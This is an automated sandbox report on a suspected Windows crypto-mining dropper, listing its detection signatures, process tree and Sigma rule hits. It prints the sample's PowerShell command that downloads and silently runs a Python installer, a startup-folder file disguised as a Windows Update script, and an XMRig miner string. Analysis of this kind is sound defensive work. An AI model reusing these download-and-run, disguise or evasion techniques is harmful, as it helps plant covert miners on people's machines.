Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3Af7PybsUi.exe

Overview

General Information

Sample name:3Af7PybsUi.exe
renamed because original name is a hash value
Original sample name:e5538b58a077cf3e5d621294aa04beca
Analysis ID:1532956
MD5:e5538b58a077cf3e5d621294aa04beca
SHA1:3e6165f27b75dcec74262ce522afcfaa2b6b9f8a
SHA256:2d92a12de1e6455ce4371765e03f1e6a74aa4f16a348bb23289cecfb7307edd5
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Creates autostart registry keys with suspicious names
Found strings related to Crypto-Mining
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • 3Af7PybsUi.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\3Af7PybsUi.exe" MD5: E5538B58A077CF3E5D621294AA04BECA)
    • 3Af7PybsUi.exe (PID: 6028 cmdline: "C:\Users\user\Desktop\3Af7PybsUi.exe" MD5: E5538B58A077CF3E5D621294AA04BECA)
      • powershell.exe (PID: 3452 cmdline: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tmpaf99aaqq.exe (PID: 2508 cmdline: "C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" /quiet InstallAllUsers=1 PrependPath=1 Include_test=0 MD5: 4FE11B2B0BB0C744CF74AFF537F7CD7F)
        • tmpaf99aaqq.exe (PID: 2908 cmdline: "C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe" -burn.clean.room="C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" -burn.filehandle.attached=640 -burn.filehandle.self=680 /quiet InstallAllUsers=1 PrependPath=1 Include_test=0 MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
          • python-3.11.0-amd64.exe (PID: 3944 cmdline: "C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{5461B88A-4125-4C2C-9E7F-F7CAF41CDAA7} {4FB5F196-D94A-42FD-9D71-D58BBB67B36C} 2908 MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
      • SrTasks.exe (PID: 3452 cmdline: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2 MD5: 2694D2D28C368B921686FE567BD319EB)
        • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • OpenWith.exe (PID: 60 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 7104 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SrTasks.exe (PID: 180 cmdline: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:1 MD5: 2694D2D28C368B921686FE567BD319EB)
    • conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 4560 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6012 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BDC2FAFBEB7EA3DA80C7B8E1870EE09C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • python.exe (PID: 1500 cmdline: "C:\Program Files\Python311\python.exe" -E -s -m ensurepip -U --default-pip MD5: B7515E4664543B43461C2ECD7A5676DC)
        • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • python-3.11.0-amd64.exe (PID: 4248 cmdline: "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /burn.runonce MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
    • python-3.11.0-amd64.exe (PID: 3308 cmdline: "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0 MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
      • python-3.11.0-amd64.exe (PID: 6048 cmdline: "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0 MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
        • python-3.11.0-amd64.exe (PID: 6272 cmdline: "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{BD19B2EA-732D-48C1-8A08-BF4B0C3D44E6} {64FC04EF-7BFE-4576-8BE3-AE2D5EB04A17} 6048 MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
  • python-3.11.0-amd64.exe (PID: 5452 cmdline: "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /burn.runonce MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
    • python-3.11.0-amd64.exe (PID: 4428 cmdline: "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0 MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
      • python-3.11.0-amd64.exe (PID: 5768 cmdline: "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=548 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0 MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
        • python-3.11.0-amd64.exe (PID: 4328 cmdline: "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{7A5BF652-324E-428D-970C-4BE0E2804237} {336D69AC-00AC-4720-B9AA-68DF04B70AEA} 5768 MD5: 7711C60D5DB60B1DFD6660016CF02D6F)
  • SrTasks.exe (PID: 4296 cmdline: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3 MD5: 2694D2D28C368B921686FE567BD319EB)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3Af7PybsUi.exe", ParentImage: C:\Users\user\Desktop\3Af7PybsUi.exe, ParentProcessId: 6028, ParentProcessName: 3Af7PybsUi.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 3452, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3Af7PybsUi.exe", ParentImage: C:\Users\user\Desktop\3Af7PybsUi.exe, ParentProcessId: 6028, ParentProcessName: 3Af7PybsUi.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 3452, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3Af7PybsUi.exe", ParentImage: C:\Users\user\Desktop\3Af7PybsUi.exe, ParentProcessId: 6028, ParentProcessName: 3Af7PybsUi.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 3452, ProcessName: powershell.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\3Af7PybsUi.exe, ProcessId: 6028, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update Script.pyw
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3Af7PybsUi.exe", ParentImage: C:\Users\user\Desktop\3Af7PybsUi.exe, ParentProcessId: 6028, ParentProcessName: 3Af7PybsUi.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 3452, ProcessName: powershell.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3Af7PybsUi.exe", ParentImage: C:\Users\user\Desktop\3Af7PybsUi.exe, ParentProcessId: 6028, ParentProcessName: 3Af7PybsUi.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 3452, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3Af7PybsUi.exe", ParentImage: C:\Users\user\Desktop\3Af7PybsUi.exe, ParentProcessId: 6028, ParentProcessName: 3Af7PybsUi.exe, ProcessCommandLine: powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath ", ProcessId: 3452, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7104, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 3Af7PybsUi.exeReversingLabs: Detection: 25%
Source: 3Af7PybsUi.exeVirustotal: Detection: 35%Perma Link
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_0049A096 DecryptFileW,23_2_0049A096
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_00499E7B DecryptFileW,DecryptFileW,23_2_00499E7B
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004BFE7F CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,23_2_004BFE7F

Bitcoin Miner

barindex
Source: 3Af7PybsUi.exe, 00000003.00000003.1855816456.000001EC89935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: # XMRig miner
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\python311.dll
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\python3.dll
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\LICENSE.txt
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\NEWS.txt
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\py.ico
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\pyc.ico
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\pyd.ico
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\python.exe
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\pythonw.exe
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\vcruntime140.dll
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\vcruntime140_1.dll
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\abstract.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\bltinmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\boolobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\bytearrayobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\bytesobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\ceval.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\codecs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\compile.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\complexobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\abstract.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\bytearrayobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\bytesobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\cellobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\ceval.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\classobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\code.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\compile.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\complexobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\context.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\descrobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\dictobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\fileobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\fileutils.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\floatobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\frameobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\funcobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\genobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\import.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\initconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\listobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\longintrepr.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\longobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\methodobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\modsupport.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\object.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\objimpl.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\odictobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\picklebufobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pthread_stubs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pyctype.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pydebug.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pyerrors.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pyfpe.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pyframe.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pylifecycle.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pymem.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pystate.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pythonrun.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pythread.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pytime.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\setobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\sysmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\traceback.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\tupleobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\unicodeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\warnings.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\weakrefobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\datetime.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\descrobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\dictobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\dynamic_annotations.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\enumobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\errcode.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\exports.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\fileobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\fileutils.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\floatobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\frameobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\genericaliasobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\import.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_abstract.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_accu.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_asdl.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_ast.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_ast_state.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_atomic.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_atomic_funcs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_bitutils.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_blocks_output_buffer.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_bytes_methods.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_bytesobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_call.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_ceval.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_code.h
